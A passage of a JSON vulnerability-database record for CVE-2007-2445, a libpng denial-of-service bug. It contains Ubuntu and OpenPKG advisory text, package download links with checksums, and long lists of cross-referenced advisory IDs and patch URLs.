http://security.ubuntu.com/ubuntu/pool/universe/libp/libpng/libpng12-0-udeb_1.2.8rel-5ubuntu0.2_sparc.udeb\n      Size/MD5:    63824 e66313895e489a36c2f438343fa3e0d4\n    http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng12-0_1.2.8rel-5ubuntu0.2_sparc.deb\n      Size/MD5:   108534 73ccb876f761c76b3518b8ca81e80485\n    http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng12-dev_1.2.8rel-5ubuntu0.2_sparc.deb\n      Size/MD5:   240048 5b19c41bbc639ee717fdacd4d81533e1\n\nUpdated packages for Ubuntu 6.10:\n\n  Source archives:\n\n    http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng_1.2.8rel-5.1ubuntu0.2.diff.gz\n      Size/MD5:    16597 4ff19b636ab120a3fc4cee767171aa4f\n    http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng_1.2.8rel-5.1ubuntu0.2.dsc\n      Size/MD5:      659 5769690df3c57a56d08aa8bf11013a42\n    http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng_1.2.8rel.orig.tar.gz\n      Size/MD5:   510681 cac1512878fb98f2456df6dc50bc9bc7\n\n  Architecture independent packages:\n\n    http://security.ubuntu.com/ubuntu/pool/universe/libp/libpng/libpng3_1.2.8rel-5.1ubuntu0.2_all.deb\n      Size/MD5:      888 44f3267b52e89fc605f350b4fc347e45\n\n  amd64 architecture (Athlon64, Opteron, EM64T Xeon)\n\n    http://security.ubuntu.com/ubuntu/pool/universe/libp/libpng/libpng12-0-udeb_1.2.8rel-5.1ubuntu0.2_amd64.udeb\n      Size/MD5:    68992 105702504b783f464dff9ddd48de5ab0\n    http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng12-0_1.2.8rel-5.1ubuntu0.2_amd64.deb\n      Size/MD5:   113542 876f5c1a3a1f6b4bf828edcbabe0702e\n    http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng12-dev_1.2.8rel-5.1ubuntu0.2_amd64.deb\n      Size/MD5:   247132 75d920fe60a5d4f356ccb43d8d5a98ed\n\n  i386 architecture (x86 compatible Intel/AMD)\n\n    http://security.ubuntu.com/ubuntu/pool/universe/libp/libpng/libpng12-0-udeb_1.2.8rel-5.1ubuntu0.2_i386.udeb\n      Size/MD5:    69932 53783b0d13fd194f8cc9f19e1edc63d7\n    http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng12-0_1.2.8rel-5.1ubuntu0.2_i386.deb\n      Size/MD5:   114634 1b40abad309e133326ffdce859734610\n    http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng12-dev_1.2.8rel-5.1ubuntu0.2_i386.deb\n      Size/MD5:   242882 3dca0a0938a43308465c8987f1357160\n\n  powerpc architecture (Apple Macintosh G3/G4/G5)\n\n    http://security.ubuntu.com/ubuntu/pool/universe/libp/libpng/libpng12-0-udeb_1.2.8rel-5.1ubuntu0.2_powerpc.udeb\n      Size/MD5:    67606 088844733b580984e1a3b79001a27511\n    http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng12-0_1.2.8rel-5.1ubuntu0.2_powerpc.deb\n      Size/MD5:   112228 6024c0c9d455cfdaa8a38e89d6a53148\n    http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng12-dev_1.2.8rel-5.1ubuntu0.2_powerpc.deb\n      Size/MD5:   246684 e45d2830ca5bdf0747ea0d436fafc20e\n\n  sparc architecture (Sun SPARC/UltraSPARC)\n\n    http://security.ubuntu.com/ubuntu/pool/universe/libp/libpng/libpng12-0-udeb_1.2.8rel-5.1ubuntu0.2_sparc.udeb\n      Size/MD5:    64656 55d6e7740ec8a9eddcbbfdada56a5f63\n    http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng12-0_1.2.8rel-5.1ubuntu0.2_sparc.deb\n      Size/MD5:   109396 0b522137b1f4b2a34f990efc9dbd81df\n    http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng12-dev_1.2.8rel-5.1ubuntu0.2_sparc.deb\n      Size/MD5:   241064 e679e908623c68c5865fbf2c24c46973\n\nUpdated packages for Ubuntu 7.04:\n\n  Source archives:\n\n    http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng_1.2.15~beta5-1ubuntu1.diff.gz\n      Size/MD5:    14344 16526f313e1ee650074edd742304ec53\n    http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng_1.2.15~beta5-1ubuntu1.dsc\n      Size/MD5:      819 b28af76731dfe368e48dfcd554d7b583\n    http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng_1.2.15~beta5.orig.tar.gz\n      Size/MD5:   829038 77ca14fcee1f1f4daaaa28123bd0b22d\n\n  Architecture independent packages:\n\n    http://security.ubuntu.com/ubuntu/pool/universe/libp/libpng/libpng3_1.2.15~beta5-1ubuntu1_all.deb\n      Size/MD5:      936 dcec28b3cf4b8ee22c6a1229fdbd2e84\n\n  amd64 architecture (Athlon64, Opteron, EM64T Xeon)\n\n    http://security.ubuntu.com/ubuntu/pool/universe/libp/libpng/libpng12-0-udeb_1.2.15~beta5-1ubuntu1_amd64.udeb\n      Size/MD5:    70656 b4fa5b37b54fee32dd7404c64b696192\n    http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng12-0_1.2.15~beta5-1ubuntu1_amd64.deb\n      Size/MD5:   189594 7e36d8e73bd47dbb19afd7cd0099335a\n    http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng12-dev_1.2.15~beta5-1ubuntu1_amd64.deb\n      Size/MD5:   179950 c575d8c9699c971ec7682e52e37590b7\n\n  i386 architecture (x86 compatible Intel/AMD)\n\n    http://security.ubuntu.com/ubuntu/pool/universe/libp/libpng/libpng12-0-udeb_1.2.15~beta5-1ubuntu1_i386.udeb\n      Size/MD5:    68246 c81ffc4cd0359a1ce1e73eb99d8608f6\n    http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng12-0_1.2.15~beta5-1ubuntu1_i386.deb\n      Size/MD5:   187234 09dcea1e3394a6d25565b23774d805db\n    http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng12-dev_1.2.15~beta5-1ubuntu1_i386.deb\n      Size/MD5:   171520 ac3fb45b36ec32b1bac4734eef162c49\n\n  powerpc architecture (Apple Macintosh G3/G4/G5)\n\n    http://security.ubuntu.com/ubuntu/pool/universe/libp/libpng/libpng12-0-udeb_1.2.15~beta5-1ubuntu1_powerpc.udeb\n      Size/MD5:    70652 147c89e36570990d5e084fc3a8933ed2\n    http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng12-0_1.2.15~beta5-1ubuntu1_powerpc.deb\n      Size/MD5:   189548 00b81b16632e789ab20bab04dbcd586c\n    http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng12-dev_1.2.15~beta5-1ubuntu1_powerpc.deb\n      Size/MD5:   179128 61c51aafc326420b202c0f2ce6d5abfd\n\n  sparc architecture (Sun SPARC/UltraSPARC)\n\n    http://security.ubuntu.com/ubuntu/pool/universe/libp/libpng/libpng12-0-udeb_1.2.15~beta5-1ubuntu1_sparc.udeb\n      Size/MD5:    66396 faff3d313cdc64f273eda1a5d01c2e0a\n    http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng12-0_1.2.15~beta5-1ubuntu1_sparc.deb\n      Size/MD5:   185312 249165d75936ab8cfc2fa1aef68a5ee6\n    http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng12-dev_1.2.15~beta5-1ubuntu1_sparc.deb\n      Size/MD5:   173800 a40164cd4995c6ed795219157e6d598e\n\n. -----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA1\n\n____________________________________________________________________________\n\nPublisher Name:          OpenPKG GmbH\nPublisher Home:          http://openpkg.com/\n\nAdvisory Id (public):    OpenPKG-SA-2007.013\nAdvisory Type:           OpenPKG Security Advisory (SA)\nAdvisory Directory:      http://openpkg.com/go/OpenPKG-SA\nAdvisory Document:       http://openpkg.com/go/OpenPKG-SA-2007.013\nAdvisory Published:      2007-05-17 22:31 UTC\n\nIssue Id (internal):     OpenPKG-SI-20070517.02\nIssue First Created:     2007-05-17\nIssue Last Modified:     2007-05-17\nIssue Revision:          03\n____________________________________________________________________________\n\nSubject Name:            png\nSubject Summary:         Portable Network Graphics (PNG) Image Format\n                         Library\nSubject Home:            http://www.libpng.org/pub/png/libpng.html\nSubject Versions:        * \u003c= 1.2.16\n\nVulnerability Id:        CVE-2007-2445\nVulnerability Scope:     global (not OpenPKG specific)\n\nAttack Feasibility:      run-time\nAttack Vector:           remote network\nAttack Impact:           denial of service\n\nDescription:\n    As confirmed by the vendor, a Denial of Service (DoS) vulnerability\n    exists in the PNG [0] image format library libpng [1]. The bug is\n    a NULL-pointer-dereference vulnerability involving palette images\n    with a malformed \"tRNS\" PNG chunk, i.e., one with a bad CRC value. \n    This bug can, at a minimum, cause crashes in applications simply by\n    displaying a malformed image. \n\nReferences:\n    [0] http://www.libpng.org/pub/png/\n    [1] http://www.libpng.org/pub/png/libpng.html\n    [2] http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-2445\n____________________________________________________________________________\n\nPrimary Package Name:    png\nPrimary Package Home:    http://openpkg.org/go/package/png\n\nCorrected Distribution:  Corrected Branch: Corrected Package:\nOpenPKG Enterprise       E1.0-SOLID        ghostscript-8.54-E1.0.1\nOpenPKG Enterprise       E1.0-SOLID        png-1.2.12-E1.0.2\nOpenPKG Community        CURRENT           ghostscript-8.57-20070516\nOpenPKG Community        CURRENT           png-1.2.18-20070516\n____________________________________________________________________________\n\nFor security reasons, this document was digitally signed with the\nOpenPGP public key of the OpenPKG GmbH (public key id 61B7AE34)\nwhich you can download from http://openpkg.com/openpkg.com.pgp\nor retrieve from the OpenPGP keyserver at hkp://pgp.openpkg.org/. \nFollow the instructions at http://openpkg.com/security/signatures/\nfor more details on how to verify the integrity of this document",
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2007-2445"
      },
      {
        "db": "CERT/CC",
        "id": "VU#684664"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2007-000397"
      },
      {
        "db": "BID",
        "id": "24000"
      },
      {
        "db": "PACKETSTORM",
        "id": "68410"
      },
      {
        "db": "PACKETSTORM",
        "id": "75976"
      },
      {
        "db": "PACKETSTORM",
        "id": "57069"
      },
      {
        "db": "PACKETSTORM",
        "id": "129524"
      },
      {
        "db": "PACKETSTORM",
        "id": "57151"
      },
      {
        "db": "PACKETSTORM",
        "id": "56849"
      }
    ],
    "trust": 3.15
  },
  "external_ids": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/external_ids#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "db": "CERT/CC",
        "id": "VU#684664",
        "trust": 3.5
      },
      {
        "db": "NVD",
        "id": "CVE-2007-2445",
        "trust": 3.3
      },
      {
        "db": "SECUNIA",
        "id": "25292",
        "trust": 3.2
      },
      {
        "db": "BID",
        "id": "24000",
        "trust": 2.7
      },
      {
        "db": "SECUNIA",
        "id": "25742",
        "trust": 2.4
      },
      {
        "db": "SECUNIA",
        "id": "25353",
        "trust": 2.4
      },
      {
        "db": "SECTRACK",
        "id": "1018078",
        "trust": 2.4
      },
      {
        "db": "BID",
        "id": "24023",
        "trust": 1.6
      },
      {
        "db": "SECUNIA",
        "id": "25571",
        "trust": 1.6
      },
      {
        "db": "SECUNIA",
        "id": "25787",
        "trust": 1.6
      },
      {
        "db": "SECUNIA",
        "id": "25329",
        "trust": 1.6
      },
      {
        "db": "SECUNIA",
        "id": "25461",
        "trust": 1.6
      },
      {
        "db": "SECUNIA",
        "id": "34388",
        "trust": 1.6
      },
      {
        "db": "SECUNIA",
        "id": "25268",
        "trust": 1.6
      },
      {
        "db": "SECUNIA",
        "id": "30161",
        "trust": 1.6
      },
      {
        "db": "SECUNIA",
        "id": "27056",
        "trust": 1.6
      },
      {
        "db": "SECUNIA",
        "id": "29420",
        "trust": 1.6
      },
      {
        "db": "SECUNIA",
        "id": "25554",
        "trust": 1.6
      },
      {
        "db": "SECUNIA",
        "id": "31168",
        "trust": 1.6
      },
      {
        "db": "SECUNIA",
        "id": "25273",
        "trust": 1.6
      },
      {
        "db": "SECUNIA",
        "id": "25867",
        "trust": 1.6
      },
      {
        "db": "VUPEN",
        "id": "ADV-2007-1838",
        "trust": 1.6
      },
      {
        "db": "VUPEN",
        "id": "ADV-2007-2385",
        "trust": 1.6
      },
      {
        "db": "VUPEN",
        "id": "ADV-2008-0924",
        "trust": 1.6
      },
      {
        "db": "XF",
        "id": "34340",
        "trust": 1.4
      },
      {
        "db": "OSVDB",
        "id": "36196",
        "trust": 1.0
      },
      {
        "db": "USCERT",
        "id": "TA08-079A",
        "trust": 0.8
      },
      {
        "db": "USCERT",
        "id": "SA08-079A",
        "trust": 0.8
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2007-000397",
        "trust": 0.8
      },
      {
        "db": "UBUNTU",
        "id": "USN-472-1",
        "trust": 0.6
      },
      {
        "db": "GENTOO",
        "id": "GLSA-200705-24",
        "trust": 0.6
      },
      {
        "db": "GENTOO",
        "id": "GLSA-200805-07",
        "trust": 0.6
      },
      {
        "db": "SUNALERT",
        "id": "102987",
        "trust": 0.6
      },
      {
        "db": "SUNALERT",
        "id": "200871",
        "trust": 0.6
      },
      {
        "db": "MANDRIVA",
        "id": "MDKSA-2007:116",
        "trust": 0.6
      },
      {
        "db": "OPENPKG",
        "id": "OPENPKG-SA-2007.013",
        "trust": 0.6
      },
      {
        "db": "DEBIAN",
        "id": "DSA-1613",
        "trust": 0.6
      },
      {
        "db": "DEBIAN",
        "id": "DSA-1750",
        "trust": 0.6
      },
      {
        "db": "REDHAT",
        "id": "RHSA-2007:0356",
        "trust": 0.6
      },
      {
        "db": "APPLE",
        "id": "APPLE-SA-2008-03-18",
        "trust": 0.6
      },
      {
        "db": "BUGTRAQ",
        "id": "20070517 FLEA-2007-0018-1: LIBPNG",
        "trust": 0.6
      },
      {
        "db": "BUGTRAQ",
        "id": "20080304 CORE-2008-0124: MULTIPLE VULNERABILITIES IN GOOGLE\u0027S ANDROID SDK",
        "trust": 0.6
      },
      {
        "db": "SLACKWARE",
        "id": "SSA:2007-136-01",
        "trust": 0.6
      },
      {
        "db": "SUSE",
        "id": "SUSE-SR:2007:013",
        "trust": 0.6
      },
      {
        "db": "TRUSTIX",
        "id": "2007-0019",
        "trust": 0.6
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-200705-347",
        "trust": 0.6
      },
      {
        "db": "PACKETSTORM",
        "id": "68410",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "75976",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "57069",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "129524",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "57151",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "56849",
        "trust": 0.1
      }
    ],
    "sources": [
      {
        "db": "CERT/CC",
        "id": "VU#684664"
      },
      {
        "db": "BID",
        "id": "24000"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2007-000397"
      },
      {
        "db": "PACKETSTORM",
        "id": "68410"
      },
      {
        "db": "PACKETSTORM",
        "id": "75976"
      },
      {
        "db": "PACKETSTORM",
        "id": "57069"
      },
      {
        "db": "PACKETSTORM",
        "id": "129524"
      },
      {
        "db": "PACKETSTORM",
        "id": "57151"
      },
      {
        "db": "PACKETSTORM",
        "id": "56849"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-200705-347"
      },
      {
        "db": "NVD",
        "id": "CVE-2007-2445"
      }
    ]
  },
  "id": "VAR-200705-0670",
  "iot": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/iot#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": true,
    "sources": [
      {
        "db": "VARIoT devices database",
        "id": null
      }
    ],
    "trust": 0.96590906
  },
  "last_update_date": "2024-07-23T21:48:39.239000Z",
  "patch": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/patch#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "title": "Security Update 2008-002",
        "trust": 0.8,
        "url": "http://support.apple.com/kb/ht1249"
      },
      {
        "title": "Security Update 2008-002",
        "trust": 0.8,
        "url": "http://support.apple.com/kb/ht1249?viewlocale=ja_jp"
      },
      {
        "title": "ImageKit6 FixNo.44",
        "trust": 0.8,
        "url": "http://www.imagekit.com/support/eng-sunewik6.html"
      },
      {
        "title": "ImageKit7 ActiveX: Update Log FixNo.2",
        "trust": 0.8,
        "url": "http://www.imagekit.com/support/eng-sunewik7ax.html"
      },
      {
        "title": "ImageKit6 Lite: Update Log FixNo.31",
        "trust": 0.8,
        "url": "http://www.imagekit.com/support/eng-sunewik6l.html"
      },
      {
        "title": "15 May 2007",
        "trust": 0.8,
        "url": "http://www.mirrorservice.org/sites/download.sourceforge.net/pub/sourceforge/l/li/libpng/libpng-1.2.17-advisory.txt"
      },
      {
        "title": "Top Page",
        "trust": 0.8,
        "url": "http://www.libpng.org/"
      },
      {
        "title": "1023",
        "trust": 0.8,
        "url": "http://www.miraclelinux.com/support/index.php?q=node/99\u0026errata_id=1023"
      },
      {
        "title": "1511",
        "trust": 0.8,
        "url": "http://www.miraclelinux.com/support/index.php?q=node/99\u0026errata_id=1511"
      },
      {
        "title": "NV07-005",
        "trust": 0.8,
        "url": "http://www.nec.co.jp/security-info/secinfo/nv07-005.html"
      },
      {
        "title": "RHSA-2007:0356",
        "trust": 0.8,
        "url": "https://rhn.redhat.com/errata/rhsa-2007-0356.html"
      },
      {
        "title": "200871",
        "trust": 0.8,
        "url": "http://sunsolve.sun.com/search/document.do?assetkey=1-66-200871-1"
      },
      {
        "title": "TLSA-2007-45",
        "trust": 0.8,
        "url": "http://www.turbolinux.com/security/2007/tlsa-2007-45.txt"
      },
      {
        "title": "RHSA-2007:0356",
        "trust": 0.8,
        "url": "http://www.jp.redhat.com/support/errata/rhsa/rhsa-2007-0356j.html"
      },
      {
        "title": "ImageKit6 VCL",
        "trust": 0.8,
        "url": "http://www.newtone.co.jp/supportik6v.html"
      },
      {
        "title": "ImageKit6",
        "trust": 0.8,
        "url": "http://www.newtone.co.jp/supportik6.html"
      },
      {
        "title": "PostKit2",
        "trust": 0.8,
        "url": "http://www.newtone.co.jp/supportpk2.html"
      },
      {
        "title": "ImageKit7 ActiveX",
        "trust": 0.8,
        "url": "http://www.newtone.co.jp/supportik7ax.html"
      },
      {
        "title": "TLSA-2007-45",
        "trust": 0.8,
        "url": "http://www.turbolinux.co.jp/security/2007/tlsa-2007-45j.txt"
      }
    ],
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2007-000397"
      }
    ]
  },
  "problemtype_data": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "problemtype": "NVD-CWE-noinfo",
        "trust": 1.0
      }
    ],
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2007-2445"
      }
    ]
  },
  "references": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/references#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "trust": 2.7,
        "url": "http://www.mirrorservice.org/sites/download.sourceforge.net/pub/sourceforge/l/li/libpng/libpng-1.2.17-advisory.txt"
      },
      {
        "trust": 2.7,
        "url": "http://www.kb.cert.org/vuls/id/684664"
      },
      {
        "trust": 2.4,
        "url": "http://www.securityfocus.com/bid/24000"
      },
      {
        "trust": 2.4,
        "url": "http://www.securitytracker.com/id?1018078"
      },
      {
        "trust": 1.9,
        "url": "http://support.avaya.com/elmodocs2/security/asa-2007-254.htm"
      },
      {
        "trust": 1.9,
        "url": "http://sunsolve.sun.com/search/document.do?assetkey=1-66-200871-1"
      },
      {
        "trust": 1.9,
        "url": "http://sunsolve.sun.com/search/document.do?assetkey=1-26-102987-1"
      },
      {
        "trust": 1.7,
        "url": "http://openpkg.com/go/openpkg-sa-2007.013"
      },
      {
        "trust": 1.6,
        "url": "http://secunia.com/advisories/25292/"
      },
      {
        "trust": 1.6,
        "url": "http://sourceforge.net/project/shownotes.php?release_id=508656\u0026group_id=5624"
      },
      {
        "trust": 1.6,
        "url": "http://sourceforge.net/project/shownotes.php?release_id=508653\u0026group_id=5624"
      },
      {
        "trust": 1.6,
        "url": "https://issues.rpath.com/browse/rpl-1381"
      },
      {
        "trust": 1.6,
        "url": "http://www.securityfocus.com/bid/24023"
      },
      {
        "trust": 1.6,
        "url": "http://www.redhat.com/support/errata/rhsa-2007-0356.html"
      },
      {
        "trust": 1.6,
        "url": "http://www.debian.org/security/2009/dsa-1750"
      },
      {
        "trust": 1.6,
        "url": "http://slackware.com/security/viewer.php?l=slackware-security\u0026y=2007\u0026m=slackware-security.492650"
      },
      {
        "trust": 1.6,
        "url": "http://secunia.com/advisories/34388"
      },
      {
        "trust": 1.6,
        "url": "http://secunia.com/advisories/25329"
      },
      {
        "trust": 1.6,
        "url": "http://secunia.com/advisories/25292"
      },
      {
        "trust": 1.6,
        "url": "http://secunia.com/advisories/25273"
      },
      {
        "trust": 1.6,
        "url": "http://secunia.com/advisories/25268"
      },
      {
        "trust": 1.6,
        "url": "http://www.ubuntu.com/usn/usn-472-1"
      },
      {
        "trust": 1.6,
        "url": "http://www.trustix.org/errata/2007/0019/"
      },
      {
        "trust": 1.6,
        "url": "http://www.novell.com/linux/security/advisories/2007_13_sr.html"
      },
      {
        "trust": 1.6,
        "url": "http://www.mandriva.com/security/advisories?name=mdksa-2007:116"
      },
      {
        "trust": 1.6,
        "url": "http://www.gentoo.org/security/en/glsa/glsa-200805-07.xml"
      },
      {
        "trust": 1.6,
        "url": "http://www.gentoo.org/security/en/glsa/glsa-200705-24.xml"
      },
      {
        "trust": 1.6,
        "url": "http://www.debian.org/security/2008/dsa-1613"
      },
      {
        "trust": 1.6,
        "url": "http://www.coresecurity.com/?action=item\u0026id=2148"
      },
      {
        "trust": 1.6,
        "url": "http://secunia.com/advisories/31168"
      },
      {
        "trust": 1.6,
        "url": "http://secunia.com/advisories/30161"
      },
      {
        "trust": 1.6,
        "url": "http://secunia.com/advisories/29420"
      },
      {
        "trust": 1.6,
        "url": "http://secunia.com/advisories/27056"
      },
      {
        "trust": 1.6,
        "url": "http://secunia.com/advisories/25867"
      },
      {
        "trust": 1.6,
        "url": "http://secunia.com/advisories/25787"
      },
      {
        "trust": 1.6,
        "url": "http://secunia.com/advisories/25742"
      },
      {
        "trust": 1.6,
        "url": "http://secunia.com/advisories/25571"
      },
      {
        "trust": 1.6,
        "url": "http://secunia.com/advisories/25554"
      },
      {
        "trust": 1.6,
        "url": "http://secunia.com/advisories/25461"
      },
      {
        "trust": 1.6,
        "url": "http://secunia.com/advisories/25353"
      },
      {
        "trust": 1.6,
        "url": "http://lists.apple.com/archives/security-announce/2008/mar/msg00001.html"
      },
      {
        "trust": 1.6,
        "url": "http://irrlicht.sourceforge.net/changes.txt"
      },
      {
        "trust": 1.6,
        "url": "http://docs.info.apple.com/article.html?artnum=307562"
      },
      {
        "trust": 1.4,
        "url": "http://www.frsirt.com/english/advisories/2007/1838"
      },
      {
        "trust": 1.4,
        "url": "http://xforce.iss.net/xforce/xfdb/34340"
      },
      {
        "trust": 1.0,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2007-2445"
      },
      {
        "trust": 1.0,
        "url": "http://android-developers.blogspot.com/2008/03/android-sdk-update-m5-rc15-released.html"
      },
      {
        "trust": 1.0,
        "url": "http://osvdb.org/36196"
      },
      {
        "trust": 1.0,
        "url": "http://www.securityfocus.com/archive/1/468910/100/0/threaded"
      },
      {
        "trust": 1.0,
        "url": "http://www.securityfocus.com/archive/1/489135/100/0/threaded"
      },
      {
        "trust": 1.0,
        "url": "http://www.vupen.com/english/advisories/2007/1838"
      },
      {
        "trust": 1.0,
        "url": "http://www.vupen.com/english/advisories/2007/2385"
      },
      {
        "trust": 1.0,
        "url": "http://www.vupen.com/english/advisories/2008/0924/references"
      },
      {
        "trust": 1.0,
        "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/34340"
      },
      {
        "trust": 1.0,
        "url": "https://oval.cisecurity.org/repository/search/definition/oval%3aorg.mitre.oval%3adef%3a10094"
      },
      {
        "trust": 0.8,
        "url": "http://sourceforge.net/project/showfiles.php?group_id=5624"
      },
      {
        "trust": 0.8,
        "url": "http://secunia.com/advisories/25353/"
      },
      {
        "trust": 0.8,
        "url": "http://secunia.com/advisories/25742/"
      },
      {
        "trust": 0.8,
        "url": "http://www.jpcert.or.jp/wr/2007/wr071901.txt"
      },
      {
        "trust": 0.8,
        "url": "http://jvn.jp/cert/jvnvu%23684664/"
      },
      {
        "trust": 0.8,
        "url": "http://jvn.jp/cert/jvnta08-079a/index.html"
      },
      {
        "trust": 0.8,
        "url": "http://jvn.jp/tr/trta08-079a/index.html"
      },
      {
        "trust": 0.8,
        "url": "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2007-2445"
      },
      {
        "trust": 0.8,
        "url": "http://www.us-cert.gov/cas/alerts/sa08-079a.html"
      },
      {
        "trust": 0.8,
        "url": "http://www.us-cert.gov/cas/techalerts/ta08-079a.html"
      },
      {
        "trust": 0.6,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2007-2445"
      },
      {
        "trust": 0.6,
        "url": "http://www.securityfocus.com/archive/1/archive/1/468910/100/0/threaded"
      },
      {
        "trust": 0.6,
        "url": "http://www.securityfocus.com/archive/1/archive/1/489135/100/0/threaded"
      },
      {
        "trust": 0.6,
        "url": "http://www.frsirt.com/english/advisories/2008/0924/references"
      },
      {
        "trust": 0.6,
        "url": "http://www.frsirt.com/english/advisories/2007/2385"
      },
      {
        "trust": 0.4,
        "url": "http://www.libpng.org/pub/png/libpng.html"
      },
      {
        "trust": 0.3,
        "url": "http://irrlicht.sourceforge.net"
      },
      {
        "trust": 0.3,
        "url": "/archive/1/491868"
      },
      {
        "trust": 0.3,
        "url": "http://rhn.redhat.com/errata/rhsa-2007-0356.html"
      },
      {
        "trust": 0.2,
        "url": "http://www.debian.org/security/faq"
      },
      {
        "trust": 0.2,
        "url": "http://packages.debian.org/\u003cpkg\u003e"
      },
      {
        "trust": 0.2,
        "url": "http://security.debian.org/"
      },
      {
        "trust": 0.2,
        "url": "http://www.debian.org/security/"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2007-5269"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/libg/libgd2/libgd2_2.0.33-5.2etch1.diff.gz"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/libg/libgd2/libgd-tools_2.0.33-5.2etch1_powerpc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/libg/libgd2/libgd-tools_2.0.33-5.2etch1_mipsel.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/libg/libgd2/libgd2-xpm-dev_2.0.33-5.2etch1_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/libg/libgd2/libgd2-xpm-dev_2.0.33-5.2etch1_sparc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/libg/libgd2/libgd2-xpm_2.0.33-5.2etch1_sparc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/libg/libgd2/libgd2-xpm_2.0.33-5.2etch1_hppa.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/libg/libgd2/libgd-tools_2.0.33-5.2etch1_ia64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/libg/libgd2/libgd2-noxpm_2.0.33-5.2etch1_mips.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/libg/libgd2/libgd2-noxpm-dev_2.0.33-5.2etch1_mipsel.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/libg/libgd2/libgd2-noxpm-dev_2.0.33-5.2etch1_hppa.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/libg/libgd2/libgd2-noxpm_2.0.33-5.2etch1_sparc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/libg/libgd2/libgd2-xpm-dev_2.0.33-5.2etch1_mips.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/libg/libgd2/libgd2_2.0.33.orig.tar.gz"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/libg/libgd2/libgd2-xpm_2.0.33-5.2etch1_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/libg/libgd2/libgd2-noxpm_2.0.33-5.2etch1_i386.deb"
      },
      {
        "trust": 0.1,
